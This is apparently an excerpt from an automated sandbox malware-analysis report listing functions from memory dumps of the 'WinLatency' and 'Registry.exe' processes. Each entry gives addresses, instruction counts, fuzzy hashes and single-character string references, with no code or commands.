Function 00007FFD9B75CDF0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de686e70a435d7778c59508ee9795dce39dfbee1634dbb919ba520e6e439fd6
Instruction ID: 9b7fca78e1e19238de5ec26bddaf7b03a31214df5f0b9f4e83ac5b0939938809
Opcode Fuzzy Hash: 3de686e70a435d7778c59508ee9795dce39dfbee1634dbb919ba520e6e439fd6
Instruction Fuzzy Hash: 1A11903090A78E4FEB56EBB488296B97BF0FF19300F0105BAD419C70B2DE746591C740

Function 00007FFD9B75119D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e225f66424083922a7271941e3e51969905b5c84b28ef827b076aecf2739e1c
Instruction ID: 6e07ae4d7916799ec2247fef8cce09aff3781da515314a3335571cd0947895fc
Opcode Fuzzy Hash: 1e225f66424083922a7271941e3e51969905b5c84b28ef827b076aecf2739e1c
Instruction Fuzzy Hash: 5B11B231E0A64E4EEBA89BE488686B97BE0FF55301F0105BEC01AC75F1EE656641C740

Function 00007FFD9B75CCC5 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814b252789fe8b94fefdabf0448ee23de2aa2ffea9e6aaa2420b95af90b90709
Instruction ID: e2824d3086ed33d5bf75e05aba76c7fd070058fd2f1998c4626961e8befdf9d7
Opcode Fuzzy Hash: 814b252789fe8b94fefdabf0448ee23de2aa2ffea9e6aaa2420b95af90b90709
Instruction Fuzzy Hash: 7B112A70A05A0E8EDBA8EF68C4A96BE77B0FF58305F10057AD419C35B4DA71A650CB40

Function 00007FFD9B7505D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314702c5e1f51b12c5290beb317f58de6f705abb7ad91355562e036b442983f8
Instruction ID: 8dccd6bfada5f00e72863cdd12b722c0690cb7dc3350d69e3acba26d9d57b59a
Opcode Fuzzy Hash: 314702c5e1f51b12c5290beb317f58de6f705abb7ad91355562e036b442983f8
Instruction Fuzzy Hash: CA018030A0560E8FEB58EFA4C0646B977A1EF58306F61457AD40EC35F4CE72A651C740

Function 00007FFD9B75B0E8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83bfe201395372d101afc19415085e38432fd0f7728a113784fa1357bec9834
Instruction ID: 014ce835a9fc7919877c8388e9b9c5f3111e5fdf111920674932d4a81d9d5e35
Opcode Fuzzy Hash: f83bfe201395372d101afc19415085e38432fd0f7728a113784fa1357bec9834
Instruction Fuzzy Hash: B4015E30A1560E8EEB58EFA4C8696BE76E0FF18305F11057AE41ED25B0DE306650C741

Function 00007FFD9B752E99 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff9c32a7a00bf5a0b7566215fbdb7b0614645b30fc07d154ce40bb92495f573d
Instruction ID: 1f6e2469946c1df125457dbc0c4e2d3ca8f720228400bad0cb3c63809e103815
Opcode Fuzzy Hash: ff9c32a7a00bf5a0b7566215fbdb7b0614645b30fc07d154ce40bb92495f573d
Instruction Fuzzy Hash: 2B017131A4E74E4FE762EBF4886D5A97BE0EF56300F0609B6D408C70B6DB68A685C711

Function 00007FFD9B75BC27 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc568ac0dfc0bae2c1e3afc64987b3dbceef1a3726a74e42bf0bbe6040fef9ec
Instruction ID: b2e6855d590f0f65d16faef46376bc7345a527ad55f60a56c3650de286190bbc
Opcode Fuzzy Hash: dc568ac0dfc0bae2c1e3afc64987b3dbceef1a3726a74e42bf0bbe6040fef9ec
Instruction Fuzzy Hash: 1801C070E1561D9EEBA4EB94C855AECB6B1FB58300F5142BAD40DE22A1DF745A81CF00

Function 00007FFD9B750608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a715d704d9a2e80e9294895b9d203cbba9cf3acf9b28f9241c2d418d1616819
Instruction ID: ba0df91cad8c9ef276d01ddd72292a8aa9cb515d828035f5a0da543e3d567633
Opcode Fuzzy Hash: 3a715d704d9a2e80e9294895b9d203cbba9cf3acf9b28f9241c2d418d1616819
Instruction Fuzzy Hash: 0501D130A1960E8BEB58EBE4C4686B973A4FF18304F500D7ED41EC21F0DE75B241CA00

Function 00007FFD9B750610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ad35a3ea0aacaa96cd7f2cf7619905ffade61a2a6705a8c9008a46383b0f6e
Instruction ID: d491c7a242b6f20f53c76170324cd30e0103679d635918b5da692f478c3b85e2
Opcode Fuzzy Hash: 02ad35a3ea0aacaa96cd7f2cf7619905ffade61a2a6705a8c9008a46383b0f6e
Instruction Fuzzy Hash: 5501AD30A1960E8EEB58EBE4C4686BA73A4FF18305F50097ED41ED21F4DE75A681CA00

Function 00007FFD9B76D4A0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfed1d48987967849b5d3b97012f5ca103ff99389621fead566440978e63c97
Instruction ID: 40e31cb4bd3c17a735396a4a00fb39e385cef8f703433ddf1b799668997e6825
Opcode Fuzzy Hash: 0cfed1d48987967849b5d3b97012f5ca103ff99389621fead566440978e63c97
Instruction Fuzzy Hash: B9011230E2590E9EEB91FBA484585BD77E4FF18305F014976D81CC3075DE34A6948A41

Function 00007FFD9B75AF88 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21fa5a6b59eab64d2875351fabddedefa000bcf43ada8ad74bf4193b0851165
Instruction ID: f0a2b49bb2499cea191c64329d92d5cb85d8bd1a323403a7f98483f71daeebc1
Opcode Fuzzy Hash: a21fa5a6b59eab64d2875351fabddedefa000bcf43ada8ad74bf4193b0851165
Instruction Fuzzy Hash: 86F08130A1560E8FEB98EFA4C4656FA76A0EF28304F11057ED41FD24F5DE356654C742

Function 00007FFD9B7505D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f733c005f986786dcf6e30a88f013e9894b6d70373d3c2035c764a568339d96e
Instruction ID: 53a326d75cff8c74eeecbe32000c76312f8157ea1a215fc177941db05504edf8
Opcode Fuzzy Hash: f733c005f986786dcf6e30a88f013e9894b6d70373d3c2035c764a568339d96e
Instruction Fuzzy Hash: 5CF0C830A0A64E8FEB54DEA494655F93790EF55305F110579E40DC24F1CE76A551C740

Function 00007FFD9B75AECC Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac12958658f0d8a453c72e825bbe579b1fc3d25fe2a4c94fd7723ec58555d620
Instruction ID: 14a12387459af78ec324667f5e3bb5ec57f1a943a682ad645e954a5a695f253f
Opcode Fuzzy Hash: ac12958658f0d8a453c72e825bbe579b1fc3d25fe2a4c94fd7723ec58555d620
Instruction Fuzzy Hash: FBF0C831E0E60E5EE760FBF888695B976E0EF18300F020976D408C30B5ED74E2858640

Function 00007FFD9B7511B0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d7cad94f5534cb9daa252d0db6f920ebeb8b905de4592dc6a477329152dc3d
Instruction ID: 471763b313358f4a8578128ea115eb4b37081b010eb861303b35d112a1719463
Opcode Fuzzy Hash: 26d7cad94f5534cb9daa252d0db6f920ebeb8b905de4592dc6a477329152dc3d
Instruction Fuzzy Hash: 55F0C230E1A64E8AEBA89BE498286F976E4FF55306F41057ED42EC24F1EFA427118640

Function 00007FFD9B75BBD2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97a5b5ff49c81787de649c01ed7891f055573806ebdf19fc087645f40b5db2f
Instruction ID: 53bcdcab657f105abf6b74502c4f2592e925a421b14483707024e4705b53f3e4
Opcode Fuzzy Hash: f97a5b5ff49c81787de649c01ed7891f055573806ebdf19fc087645f40b5db2f
Instruction Fuzzy Hash: 1B01CC70D0521D8EEB60DF94C8647EC76F0FB18310F1142A6D409E72A1DB7866858B54

Function 00007FFD9B752719 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c9d4e8a53c370fc588f43926efc6f1be005045bb5f8a225512ec3b841e3bb9
Instruction ID: e83588de72cc42c005afb78bf1e6a1f76657d3275b3ca018f1d14875c15cef8d
Opcode Fuzzy Hash: c0c9d4e8a53c370fc588f43926efc6f1be005045bb5f8a225512ec3b841e3bb9
Instruction Fuzzy Hash: 8EF0A431A0E38D4FEB6A9BA488251A97B60FF06300F4509BAD459C61E2DA78A515C741

Function 00007FFD9B75278D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc55f97f2de8661764f96dc05c159001ebcba0581db9c70760f8cb540c7a2d5
Instruction ID: 9e203e6e09954747197b93d9dcbd0929e72d02c403de286c2780fb6fc58c49ad
Opcode Fuzzy Hash: 6bc55f97f2de8661764f96dc05c159001ebcba0581db9c70760f8cb540c7a2d5
Instruction Fuzzy Hash: DFF0F030A0E78E8FEB699FB088291A93BA0FF05300F4109BED509C60F2EB789554CB00

Function 00007FFD9B75BCCC Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e35cbc1646850ca919dbb2f3fc5a49a2686c6a7fe1f12e0982defa1634c425e
Instruction ID: 04b8dc0acf1cc77d2b34ff68901ebad2472c5270294e56333f57292fcff6ddf6
Opcode Fuzzy Hash: 5e35cbc1646850ca919dbb2f3fc5a49a2686c6a7fe1f12e0982defa1634c425e
Instruction Fuzzy Hash: BDF01D70E19A1D4EDBA4EB98C855BA973B1FB58300F1143A6D40DD22B6CE74AA818B40

Function 00007FFD9B750F6B Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c51f1825ab21a8ca294fe5da591d4476bbbed9de3c29cd9101130f5b3e290d
Instruction ID: 585c3729b4bbe03003f551469b012cd45c523b9c91ce9d8b1cfcf77e43c834f0
Opcode Fuzzy Hash: b7c51f1825ab21a8ca294fe5da591d4476bbbed9de3c29cd9101130f5b3e290d
Instruction Fuzzy Hash: D6F01D34A1A50D8FEB24DB94C860BED72B1FB59301F5152B9D00AA32E5DE746E418B40

Non-executed Functions

Function 00007FFD9B75F323 Relevance: 7.6, Strings: 6, Instructions: 90COMMON

Download Yara Rule

Strings

-, xrefs: 00007FFD9B75F3AB
Q, xrefs: 00007FFD9B75F344
[, xrefs: 00007FFD9B75F337
Y, xrefs: 00007FFD9B75F3F1
", xrefs: 00007FFD9B75F3E1
%, xrefs: 00007FFD9B75F455

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: "$%$-$Q$Y$[
API String ID: 0-819147419
Opcode ID: 8c57938945cdceb9937963c2419672151f56a307e93545e1084a5dc4e9e78a86
Instruction ID: deaf028f7a1477399dcd5f3577e1bbb131d0a7087ca26c550fc78b754f0bc00a
Opcode Fuzzy Hash: 8c57938945cdceb9937963c2419672151f56a307e93545e1084a5dc4e9e78a86
Instruction Fuzzy Hash: BF41D470E0572D8EDB68DF90C8A47E9B7B2AF58301F4001F9D44DA62A1CB786A85DF41

Function 00007FFD9B75387E Relevance: 5.1, Strings: 4, Instructions: 108COMMON

Download Yara Rule

Strings

/T^I, xrefs: 00007FFD9B753924
0T^I, xrefs: 00007FFD9B753944
.T^I, xrefs: 00007FFD9B753954
8T^, xrefs: 00007FFD9B7538D4

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: .T^I$/T^I$0T^I$8T^
API String ID: 0-1311999304
Opcode ID: 8fea4249f40075bf36316991c4f74563a8b2b7bde52b850133c5f5cf779426ad
Instruction ID: 899b6378e48b2a75046c88009bbe9e27ee09d797b4f5dd2c03904d0fe83fe1e7
Opcode Fuzzy Hash: 8fea4249f40075bf36316991c4f74563a8b2b7bde52b850133c5f5cf779426ad
Instruction Fuzzy Hash: 2841C68260F7C51FE72246B80C346953FE4EF5313475A02FFD1A9CA0F7E658594A83A1

Function 00007FFD9B7538B8 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

/T^I, xrefs: 00007FFD9B753924
0T^I, xrefs: 00007FFD9B753944
.T^I, xrefs: 00007FFD9B753954
8T^, xrefs: 00007FFD9B7538D4

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: .T^I$/T^I$0T^I$8T^
API String ID: 0-1311999304
Opcode ID: 782a85811706689bc781eb0f427e7d526e7c7fd8f41222893991f32051a2c658
Instruction ID: 73c1cf3c2d73e9bfa04765d0c13d3a299d93ccb7e30dccb0de8dc9df688f2a1e
Opcode Fuzzy Hash: 782a85811706689bc781eb0f427e7d526e7c7fd8f41222893991f32051a2c658
Instruction Fuzzy Hash: 9B21BD83A0FBC51BE77145F80C352A57F84EF2222875A03FFD199860F7E6546A4683A1

Function 00007FFD9B75F0E3 Relevance: 5.1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

-, xrefs: 00007FFD9B75F3AB
Y, xrefs: 00007FFD9B75F3F1
", xrefs: 00007FFD9B75F3E1
%, xrefs: 00007FFD9B75F455

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: "$%$-$Y
API String ID: 0-2898851251
Opcode ID: e98dced4d196e8ce540bdbfe23cc483cb370dd3c634300b3395b7bccd4a19c41
Instruction ID: eb4fb7a58a13bf1e68b7b0bff7efedcaf36a4689b49d70af8302e853b6c0b234
Opcode Fuzzy Hash: e98dced4d196e8ce540bdbfe23cc483cb370dd3c634300b3395b7bccd4a19c41
Instruction Fuzzy Hash: BA31E870A0572E8FDB68DF54C8A47F9B7B2AF58301F5002F9D40DA62A1CB786A81DF40

Analysis Process: Registry.exePID: 8144, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B772700 Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77276A

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 5ccc969e042bef7053e47d56f52349117c5ddefa0b623173cba2e06a78801d90
Instruction ID: 3c1ab1f274710ed043c06132e00dd5f2bbca1f2b93899b732a8e77a86daec858
Opcode Fuzzy Hash: 5ccc969e042bef7053e47d56f52349117c5ddefa0b623173cba2e06a78801d90
Instruction Fuzzy Hash: D5A1D330A0A64E8FDB54DFA4C8A46FE77F0FF19304F1146BAD419D31A5DA74A644CB40

Function 00007FFD9B7633B8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17edad248700e30bd268d534f20c51676a5a677402e6145a3282fab399f01b08
Instruction ID: a009e30ecf0a5583f1fdc6d5bdea4d465295318956a8f3d74dd391391beb57c5
Opcode Fuzzy Hash: 17edad248700e30bd268d534f20c51676a5a677402e6145a3282fab399f01b08
Instruction Fuzzy Hash: A4F1D071A19A4E8FEB55DBA8C8687B97BF0FF59300F0102BAD009C72E6DB786901C751

Function 00007FFD9B76BDCC Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2487fff97179bea076e7d8363deaca51cfc6afe043cc97af212612e72ac7e9f
Instruction ID: fb04788584a48f6754bbab951b602399bc73802999044993a75d51a10e2d0f6e
Opcode Fuzzy Hash: c2487fff97179bea076e7d8363deaca51cfc6afe043cc97af212612e72ac7e9f
Instruction Fuzzy Hash: 30F1A230E1A64E8FEB65EBB4C8695F97BF0FF19300F1106BAD419C71B2DA34A6448742

Function 00007FFD9B76EB07 Relevance: 11.5, Strings: 9, Instructions: 232COMMON

Download Yara Rule

Strings

K, xrefs: 00007FFD9B76ED80
}, xrefs: 00007FFD9B76ED47
L, xrefs: 00007FFD9B76FB0B
7, xrefs: 00007FFD9B76EB61
X, xrefs: 00007FFD9B76ECF0
I, xrefs: 00007FFD9B76EB14
E, xrefs: 00007FFD9B7700AB
{, xrefs: 00007FFD9B76ECE7
{, xrefs: 00007FFD9B76FFC7

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: 7$E$I$K$L$X${${$}
API String ID: 0-1139972885
Opcode ID: 286559631629e8ceac62dddd2f61fbe12e506098cecb8461d59a152239a4b121
Instruction ID: fc3291a74d14d1a7629aab1b8debef662c8087ef3af0090ecf9791e69474d072
Opcode Fuzzy Hash: 286559631629e8ceac62dddd2f61fbe12e506098cecb8461d59a152239a4b121
Instruction Fuzzy Hash: 23B1B470A0962DCFEBA8DF14C8A47A9B7B1BF54301F1101EAD44DA72A1DB386E84DF15

Function 00007FFD9B76F464 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD9B770434
Z, xrefs: 00007FFD9B76F471
_, xrefs: 00007FFD9B770498

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: A$Z$_
API String ID: 0-3891705896
Opcode ID: 5d5c849b34d62dc89cfbf24f969d2b0b5520ebf2be27767339a8b91b300fe137
Instruction ID: 8ca312e54a27b7681ae2159fc2cd1874500c1c3d7871082c59f6e091558e03cb
Opcode Fuzzy Hash: 5d5c849b34d62dc89cfbf24f969d2b0b5520ebf2be27767339a8b91b300fe137
Instruction Fuzzy Hash: 565108B1E1562D8FDBA8DF58C8A57A8B7B1FF54301F1001E9D10DA32A1DB746E818F45

Function 00007FFD9B76CC1F Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

%w, xrefs: 00007FFD9B76CCCE

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: %w
API String ID: 0-4253275273
Opcode ID: 50ff597c5b03c3daf54e13b6e1700670e3e8bebe0fc842301c7ee1795ec9f759
Instruction ID: 3cacd98592fcca99ec921905116f31d92a16240ff3f4fa4f50029f377a973e39
Opcode Fuzzy Hash: 50ff597c5b03c3daf54e13b6e1700670e3e8bebe0fc842301c7ee1795ec9f759
Instruction Fuzzy Hash: 4281212BB496668EE31537BCB8254FC7B60EF51335B0902B3E18DCA0E3DE1938458A95

Function 00007FFD9B76AF88 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77276A

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0f4e464e095e8b9a09a3fddde256261cddd5f30d59371b02d90f3f62e738e31f
Instruction ID: c4c6f71837af8fdd0e50e3b68d41213b2cc7b2f942d4e8245f643799927e3f9e
Opcode Fuzzy Hash: 0f4e464e095e8b9a09a3fddde256261cddd5f30d59371b02d90f3f62e738e31f
Instruction Fuzzy Hash: 2591A530A1A38E8FDB659FA488655FA3BF0FF16304F1606BBD419C31A2DB78A654C741

Function 00007FFD9B76AF38 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77276A

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: ab8359f10d7865a379a0f19dcd64d4a4e2004b2a6f5ea5b3584a5d0d7e2c5d2f
Instruction ID: eb28f82142a6707803b8bdd52e2a62680f43895816afa74cbdbe6fb321aa4560
Opcode Fuzzy Hash: ab8359f10d7865a379a0f19dcd64d4a4e2004b2a6f5ea5b3584a5d0d7e2c5d2f
Instruction Fuzzy Hash: 7F91E630A1A34E8FDB559FA488A55F93BF0FF06314F0506BBE459C31A2DB78A544CB81

Function 00007FFD9B7629CF Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B777AAA

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0dc26ac0ac29dfb568a0ffc2912289005e381c2e9c26a5f654f070e3f99cf97a
Instruction ID: b83901de42952ca17f5ecb26f91cca4a0750a54fb31776460f2b05524c33fad3
Opcode Fuzzy Hash: 0dc26ac0ac29dfb568a0ffc2912289005e381c2e9c26a5f654f070e3f99cf97a
Instruction Fuzzy Hash: 8781B230A0A64E9FEB55EB68C8686FD7BF0EF19314F1105BBD409C71B2DA74A644CB40

Function 00007FFD9B76B080 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77124A

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: f69a85e742db13e7873de55ce46ba2c0d913f7f18dc8736913c07547db68c6d0
Instruction ID: ce2e149941d9a4fc09a23c5a9fa9d75e7e1ac022f63f93903fa165a95b7f1dd5
Opcode Fuzzy Hash: f69a85e742db13e7873de55ce46ba2c0d913f7f18dc8736913c07547db68c6d0
Instruction Fuzzy Hash: 6051BD30A1A78E8FDB55EF64C8A96BA7BB0FF19300F1106BED419C71A2DB74A644C741

Function 00007FFD9B76C668 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

S_H, xrefs: 00007FFD9B76C673

Memory Dump Source

